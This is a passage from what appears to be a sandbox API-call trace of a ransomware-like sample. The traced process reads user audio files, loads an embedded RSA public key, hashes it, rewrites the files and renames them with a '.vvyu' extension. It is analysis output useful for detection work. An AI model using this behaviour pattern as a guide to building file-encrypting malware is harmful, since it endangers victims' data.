nNumberOfBytesToWrite=0xcb8, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e902a0*, lpNumberOfBytesWritten=0x312fb14*=0xcb8, lpOverlapped=0x0) returned 1 [0199.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a0 | out: hHeap=0x620000) returned 1 [0199.272] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xcbd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.272] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.272] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.273] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.274] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.274] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.274] CloseHandle (hObject=0x510) returned 1 [0199.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.275] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea6a68 [0199.275] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.275] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\-xht.wav" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\-xht.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\-xht.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\-xht.wav.vvyu")) returned 1 [0199.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.280] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0199.283] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb36b4ba0, ftCreationTime.dwHighDateTime=0x1d89c5b, ftLastAccessTime.dwLowDateTime=0xc1d0b590, ftLastAccessTime.dwHighDateTime=0x1d8a471, ftLastWriteTime.dwLowDateTime=0xc1d0b590, ftLastWriteTime.dwHighDateTime=0x1d8a471, nFileSizeHigh=0x0, nFileSizeLow=0x27b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jZE7XRus.m4a", cAlternateFileName="")) returned 1 [0199.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.283] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x76) returned 0x6a53e0 [0199.283] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.283] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\jZE7XRus.m4a") returned=".m4a" [0199.283] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\jZE7XRus.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\jze7xrus.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.284] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=10165) returned 1 [0199.284] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.287] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x278f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.287] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.290] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.290] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x27b5, lpOverlapped=0x0) returned 1 [0199.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.291] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.291] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0199.292] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.292] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.292] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.292] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.292] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.292] GetLastError () returned 0x0 [0199.293] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.293] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0199.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.293] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.293] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.293] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.293] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x27c0) returned 0x2ea79b0 [0199.294] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f390 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f3d8 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3140 [0199.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.295] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3140 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea30e0 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0199.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.298] GetCurrentThreadId () returned 0x66c [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6460 [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.298] GetCurrentThreadId () returned 0x66c [0199.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3188 [0199.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3140 [0199.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0199.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31a0 [0199.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0199.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3170 [0199.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3158 [0199.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea31b8 [0199.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3158 [0199.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3170 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0199.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0199.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30e0 [0199.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3188 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0199.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31b8 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0199.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3158 | out: hHeap=0x620000) returned 1 [0199.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea31a0 | out: hHeap=0x620000) returned 1 [0199.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f3d8 | out: hHeap=0x620000) returned 1 [0199.308] HeapFree 